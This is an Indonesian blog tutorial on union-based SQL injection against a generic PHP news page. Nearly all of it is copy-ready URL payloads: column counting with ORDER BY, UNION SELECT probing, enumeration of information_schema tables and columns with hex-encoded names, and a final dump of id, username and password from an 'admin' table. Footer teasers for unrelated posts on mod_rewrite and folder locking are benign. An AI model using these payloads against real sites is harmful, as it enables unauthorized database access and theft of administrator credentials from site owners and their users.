Langsung ke konten utama

Mengenal Lebih Dekat Dengan SQL Injection Part 2


TEKHNIK SQL INJECTION
Disini kita akan mengenal lebih dekat tekhnik SQL Injection pada sebuah sistem. Jika dalam sebuah website dimana ketika dimasukan special karakter seperti singgle quote (') mengalami error maka website tersebut dikatakan memiliki vulnerbilitas (vuln).
INJECTION SQL versi 5
Pada SQL versi ini value dapat di tampilkan melalui pemanggilan pada syntac SQL
Contoh :

==========
=step Satu:=
==========

[site]/berita.php?id=100’
 (ditambahkan single quote) mengalami error maka sistem tersebut dapat di explore
==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
contoh:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
contoh:
[site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi :
[site]/berita.php?id=-100+order+by+8--

===========
=step Tiga:=
===========

Untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Kita anggap yang keluar angka 5

gunakan perintah “version()” atau “@@version” untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

Untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables-- >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Kita anggap table yang muncul adalah "admin"


===========
=step Lima:=
===========

Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

Perintah group_concat(column_name) >>> dimasukan pada angka yang sebelumnya
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm
Banyak juga tools yang dapat mengkonversi bilangan hexa ini. Contoh : hexeditor, hex calculator, dll

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

Perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

Sampai disini kita sudah mendapatkan isi dari database yang kita inginkan.

 inget  ini untuk versi 5, untuk versi 4 berbeda metode, 

Gunakan ilmu yang di peroleh unuk kebaikan jangan buat ngisengin orang lain yah ^_^


Komentar

Posting Komentar

Postingan populer dari blog ini

Mengaktifkan Mod Rewrite di Os Distro Linux Debian / Ubuntu

Oke saya posting ini karena kebetuluan beberapa hari yang lalu saya bikin web dan saya coba menggunakan metode penyederhanaan link sehingga membantu untuk meningkatkan SEOnya,, dengan menggunakan file *. htacces yang isinya redirect link gitu... tapi ketika saya hosting ke server ... kebetulan os yang di gunakan menggunakan distro linux debian... tapi saya juga coba di distro linux ubuntu teryata sama walhasil website yang saya buat  error dengan pesan kesalah bahwa link yang di panggil tidak tersedia... setelah saya serching sana-sini akhirnya ketemu nih jurus manjurnya... mudah-mudahan bisa bermanfaat . >> Masuk ke super user dengan perintah      sudo su >> selanjutnya gunakan perintah locate untuk menemukan lokasi mod_rewrite.so pada server     locate   mod_rewrite.so >> ketemu, lokasinya di “/usr/lib/apache2/modules” >> selanjutnya masuk ke direktori mods-enabled     cd   /etc/apache2/mod...
Posting Komentar
Baca selengkapnya

Cara Mengunci Folder dengan pasword dan menyembunyikanya pada OS windows 7 Tanpa Bantuan Sofware Apapun

Oke sharing lagi akhir-akhir ini si compy di rumah banyak yang sering pake dan wal hasil data penting ane banyak yang hilang karena tangan-tangan yang tidak bertanggung jawab .... setelah di coba-coba searching sana sini ketemu nih solusinya oke materi di mulai.... untuk mengunci folder untuk OS windows 7 berikut langkah - langkahnya silakan di simak ^_^ Langkah Pertama Siapkan Folder dengan nama Private seperti pada gambar berkut :  Sebenernya sih nama directorynya boleh bebas asl jangan ada spasih aja di namnya ... oke selanjutnya  langkah 2 :  Buka NotePad kemudian ketikan kode program di bawah ini : ========================================================================== Quote: Quote: cls @ECHO OFF title Folder Private if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Private goto MDLOCKER :CONFIRM echo Are you sure you want to lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto...
Posting Komentar
Baca selengkapnya

Contoh Rewrite Rule

melanjutkan post yang sebelumnya mengenai penyerderhanaan  link di website Sedikit aja Nih Gan Silakan di simak... RewriteEngine on RewriteRule ^home$ media.php?module=home [L] RewriteRule ^galeri-(.*)\.html$ zoom.php?id=$1 [L] RewriteRule ^album-(.*)\.html$ media.php?module=detailalbum&id=$1 [L] RewriteRule ^berita-(.*)\.html$ media.php?module=detailberita&id=$1 [L] RewriteRule ^agenda-(.*)\.html$ media.php?module=detailagenda&id=$1 [L] RewriteRule ^hasil-pencarian\.html$ media.php?module=hasilcari&id=$1 [L] RewriteRule ^indeks-berita\.html$ media.php?module=indeksberita&id=$1 [L] RewriteRule ^hasil-poling\.html$ media.php?module=hasilpoling&id=$1 [L] RewriteRule ^lihat-poling\.html$ media.php?module=lihatpoling&id=$1 [L] RewriteRule ^profil-kami\.html$ media.php?module=profilkami&id=$1 [L] RewriteRule ^tentang\.html$ media.php?module=tentang&id=$28 [L] RewriteRule ^hubungi-kami\.html$ media.php?module=hubungikami&id=$1 [L] R...
Posting Komentar
Baca selengkapnya